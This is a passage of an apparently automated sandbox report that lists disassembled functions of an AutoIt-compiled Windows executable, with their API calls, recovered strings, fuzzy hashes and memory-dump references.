                                                                                                                              • Opcode Fuzzy Hash: 58f82714689a782f80f7a117a2257d1bfaf056700610ff019492aeb6191e90a7
                                                                                                                              • Instruction Fuzzy Hash: 71A170302143019FCB18FF54D851A6AB3A6FF65354F14896EF8969B392DB30ED06CB81
                                                                                                                              Function 001ADD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 001ADD87
                                                                                                                              • __swprintf.LIBCMT ref: 001ADE28
                                                                                                                              • _wcscmp.LIBCMT ref: 001ADE3B
                                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001ADE90
                                                                                                                              • _wcscmp.LIBCMT ref: 001ADECC
                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 001ADF03
                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 001ADF55
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001ADF8B
                                                                                                                              • GetParent.USER32(?), ref: 001ADFA9
                                                                                                                              • ScreenToClient.USER32(00000000), ref: 001ADFB0
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 001AE02A
                                                                                                                              • _wcscmp.LIBCMT ref: 001AE03E
                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 001AE064
                                                                                                                              • _wcscmp.LIBCMT ref: 001AE078
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                              • String ID: %s%u
                                                                                                                              • API String ID: 3119225716-679674701
                                                                                                                              • Opcode ID: d9fb72bc723615c54776d0c5245e93cb311f71fc566f798c5ac0a1423e330adc
                                                                                                                              • Instruction ID: b4d4ba6449097dd1631e4f446520556d3538a87ad965f4881c42a5fc86d5fb91
                                                                                                                              • Opcode Fuzzy Hash: d9fb72bc723615c54776d0c5245e93cb311f71fc566f798c5ac0a1423e330adc
                                                                                                                              • Instruction Fuzzy Hash: B9A1FE75204706AFDB14DF60D884BAAB7E9FF15310F008629F9AAC7190DB30EA46CB91
                                                                                                                              Function 001AE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 001AE6E1
                                                                                                                              • _wcscmp.LIBCMT ref: 001AE6F2
                                                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 001AE71A
                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 001AE737
                                                                                                                              • _wcscmp.LIBCMT ref: 001AE755
                                                                                                                              • _wcsstr.LIBCMT ref: 001AE766
                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 001AE79E
                                                                                                                              • _wcscmp.LIBCMT ref: 001AE7AE
                                                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 001AE7D5
                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 001AE81E
                                                                                                                              • _wcscmp.LIBCMT ref: 001AE82E
                                                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 001AE856
                                                                                                                              • GetWindowRect.USER32(00000004,?), ref: 001AE8BF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                              • String ID: @$ThumbnailClass
                                                                                                                              • API String ID: 1788623398-1539354611
                                                                                                                              • Opcode ID: f658e2005b9459dbb37fa126c12f407839db64464f4a470b3f931bb358661c4b
                                                                                                                              • Instruction ID: 00660bc61e2b5d240162044a04ca991feaf0b26bb45f2b17f2e4a74213fb2a80
                                                                                                                              • Opcode Fuzzy Hash: f658e2005b9459dbb37fa126c12f407839db64464f4a470b3f931bb358661c4b
                                                                                                                              • Instruction Fuzzy Hash: FE81CF35008309ABDB05CF54C881FBA7BE9FF55318F14846AFD899A092DB34DD86CBA1
                                                                                                                              Function 001AE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcsnicmp
                                                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                              • API String ID: 1038674560-1810252412
                                                                                                                              • Opcode ID: a446efc441bbcb19d9ac0da43ac347b2b7c4c5e466a23def4cb992326e7ef61d
                                                                                                                              • Instruction ID: d77db622cee70a2c5acfd7b9d57d326f4ff96299624a8e4e1c8803c647bbd216
                                                                                                                              • Opcode Fuzzy Hash: a446efc441bbcb19d9ac0da43ac347b2b7c4c5e466a23def4cb992326e7ef61d
                                                                                                                              • Instruction Fuzzy Hash: 2631CE39A48219F6CB18EBA0ED13EAE73B95F32714F20442AF545710D5FFA2AF188651
                                                                                                                              Function 001AF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadIconW.USER32(00000063), ref: 001AF8AB
                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001AF8BD
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 001AF8D4
                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 001AF8E9
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 001AF8EF
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 001AF8FF
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 001AF905
                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001AF926
                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001AF940
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001AF949
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 001AF9B4
                                                                                                                              • GetDesktopWindow.USER32 ref: 001AF9BA
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 001AF9C1
                                                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 001AFA0D
                                                                                                                              • GetClientRect.USER32(?,?), ref: 001AFA1A
                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 001AFA3F
                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001AFA6A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3869813825-0
                                                                                                                              • Opcode ID: 9e6eba221f70a842202ce235b81f5fbf06d5e0dc82c7d82ae005c16a8d1d97b4
                                                                                                                              • Instruction ID: e297065621fd794f2d1631269a6924db409246734c47d7b3bb7c5122d373f3e4
                                                                                                                              • Opcode Fuzzy Hash: 9e6eba221f70a842202ce235b81f5fbf06d5e0dc82c7d82ae005c16a8d1d97b4
                                                                                                                              • Instruction Fuzzy Hash: 6A514A74900709AFDB209FA8DD89B7EBBB5FF04708F00492CE596A29A0D774A945CB10
                                                                                                                              Function 001C01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _wcscpy.LIBCMT ref: 001C026A
                                                                                                                              • _wcschr.LIBCMT ref: 001C0278
                                                                                                                              • _wcscpy.LIBCMT ref: 001C028F
                                                                                                                              • _wcscat.LIBCMT ref: 001C029E
                                                                                                                              • _wcscat.LIBCMT ref: 001C02BC
                                                                                                                              • _wcscpy.LIBCMT ref: 001C02DD
                                                                                                                              • __wsplitpath.LIBCMT ref: 001C03BA
                                                                                                                              • _wcscpy.LIBCMT ref: 001C03DF
                                                                                                                              • _wcscpy.LIBCMT ref: 001C03F1
                                                                                                                              • _wcscpy.LIBCMT ref: 001C0406
                                                                                                                              • _wcscat.LIBCMT ref: 001C041B
                                                                                                                              • _wcscat.LIBCMT ref: 001C042D
                                                                                                                              • _wcscat.LIBCMT ref: 001C0442
                                                                                                                                • Part of subcall function 001BC890: _wcscmp.LIBCMT ref: 001BC92A
                                                                                                                                • Part of subcall function 001BC890: __wsplitpath.LIBCMT ref: 001BC96F
                                                                                                                                • Part of subcall function 001BC890: _wcscpy.LIBCMT ref: 001BC982
                                                                                                                                • Part of subcall function 001BC890: _wcscat.LIBCMT ref: 001BC995
                                                                                                                                • Part of subcall function 001BC890: __wsplitpath.LIBCMT ref: 001BC9BA
                                                                                                                                • Part of subcall function 001BC890: _wcscat.LIBCMT ref: 001BC9D0
                                                                                                                                • Part of subcall function 001BC890: _wcscat.LIBCMT ref: 001BC9E3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                              • API String ID: 2955681530-2806939583
                                                                                                                              • Opcode ID: 3d780e6f9421e543bb2c253846480e1c2a843502ac90e8bd69884487bf2c0487
                                                                                                                              • Instruction ID: 80b0989f7a40f7f3d4f1cc492e52271610d70bb206a6fcef50ce2a34c688fb14
                                                                                                                              • Opcode Fuzzy Hash: 3d780e6f9421e543bb2c253846480e1c2a843502ac90e8bd69884487bf2c0487
                                                                                                                              • Instruction Fuzzy Hash: CF91B271504701AFCB25EB50C955F9FB3E8BFA8314F04885DF5499B292EB34EA44CB92
                                                                                                                              Function 001DCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001DCD0B
                                                                                                                              • DestroyWindow.USER32(00000000,?), ref: 001DCD83
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001DCE04
                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001DCE26
                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001DCE35
                                                                                                                              • DestroyWindow.USER32(?), ref: 001DCE52
                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00170000,00000000), ref: 001DCE85
                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001DCEA4
                                                                                                                              • GetDesktopWindow.USER32 ref: 001DCEB9
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 001DCEC0
                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001DCED2
                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001DCEEA
                                                                                                                                • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                              • API String ID: 1297703922-3619404913
                                                                                                                              • Opcode ID: f5e723e6e394643c1e3961c79598e9301262bbfb25c13c63128435d8c2e14775
                                                                                                                              • Instruction ID: 941a587591a4cad0494a103e7bafd8b28fcf0741de764480394c87507c1ec0e4
                                                                                                                              • Opcode Fuzzy Hash: f5e723e6e394643c1e3961c79598e9301262bbfb25c13c63128435d8c2e14775
                                                                                                                              • Instruction Fuzzy Hash: 3071BCB114430AAFE724CF28DC45FBA7BE6EB88704F040919F985973A1DB70E811CB55
                                                                                                                              Function 001BB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 001BB46D
                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 001BB476
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001BB482
                                                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001BB561
                                                                                                                              • __swprintf.LIBCMT ref: 001BB591
                                                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 001BB5BD
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001BB63F
                                                                                                                              • SysFreeString.OLEAUT32(00000016), ref: 001BB6D1
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001BB727
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001BB736
                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 001BB772
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                              • API String ID: 3730832054-3931177956
                                                                                                                              • Opcode ID: ef3b895e15f24f016369ff035162ce642bc7231e8e80531c14ae496ee1c1c5e3
                                                                                                                              • Instruction ID: 95e5cb2d18982f6a5281fa7ad4937f8bafda6bf716b948e48266435b8f8ad921
                                                                                                                              • Opcode Fuzzy Hash: ef3b895e15f24f016369ff035162ce642bc7231e8e80531c14ae496ee1c1c5e3
                                                                                                                              • Instruction Fuzzy Hash: D1C11071A08215EFCB14DF65D8C4BBAB7B4FF49300F158465E44A9B982DBB0EC80DBA1
                                                                                                                              Function 001D6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 001D6FF9
                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001D7044
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                              • API String ID: 3974292440-4258414348
                                                                                                                              • Opcode ID: 9e8062b2dbbf04a64b8fda0b59be1c0fa0a71a6a8d7325762015f6ebb83d7565
                                                                                                                              • Instruction ID: 434861e3b93e5cafc8b21db1f94343df1ffa5638cc6eb4582b3d98beeef3e982
                                                                                                                              • Opcode Fuzzy Hash: 9e8062b2dbbf04a64b8fda0b59be1c0fa0a71a6a8d7325762015f6ebb83d7565
                                                                                                                              • Instruction Fuzzy Hash: 099183342047019FCB18FF14D851A6EB7A2AFA9354F04885DF8965B7D2DB31ED46CB82
                                                                                                                              Function 001DE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001DE3BB
                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001DBCBF), ref: 001DE417
                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001DE457
                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001DE49C
                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001DE4D3
                                                                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,001DBCBF), ref: 001DE4DF
                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001DE4EF
                                                                                                                              • DestroyCursor.USER32(?), ref: 001DE4FE
                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001DE51B
                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001DE527
                                                                                                                                • Part of subcall function 00191BC7: __wcsicmp_l.LIBCMT ref: 00191C50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                              • API String ID: 3907162815-1154884017
                                                                                                                              • Opcode ID: 3f55492cf1de4371bceb6e4bee210a6ce358caf6d3b33faa5aa5b146ba66f9bc
                                                                                                                              • Instruction ID: a6e127ed446aeb1c9f1be0aa8e6877810d75945a7449e34004386e5dd31d86bb
                                                                                                                              • Opcode Fuzzy Hash: 3f55492cf1de4371bceb6e4bee210a6ce358caf6d3b33faa5aa5b146ba66f9bc
                                                                                                                              • Instruction Fuzzy Hash: EB61CF71940219BEEB14EF64DC46FBE7BB8BB08711F108206F915EA2D0DB74D980DBA0
                                                                                                                              Function 001C0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 001C0EFF
                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 001C0F0F
                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001C0F1B
                                                                                                                              • __wsplitpath.LIBCMT ref: 001C0F79
                                                                                                                              • _wcscat.LIBCMT ref: 001C0F91
                                                                                                                              • _wcscat.LIBCMT ref: 001C0FA3
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 001C0FB8
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C0FCC
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C0FFE
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C101F
                                                                                                                              • _wcscpy.LIBCMT ref: 001C102B
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001C106A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 3566783562-438819550
                                                                                                                              • Opcode ID: d4bd98a446a26d2ef0162ae90c3474290683a2672eb922eecdf51c907c0b5a2b
                                                                                                                              • Instruction ID: 3cf3039234d3a3779380efc4aae5878a1686853f1153b9012f28ea676ab762f1
                                                                                                                              • Opcode Fuzzy Hash: d4bd98a446a26d2ef0162ae90c3474290683a2672eb922eecdf51c907c0b5a2b
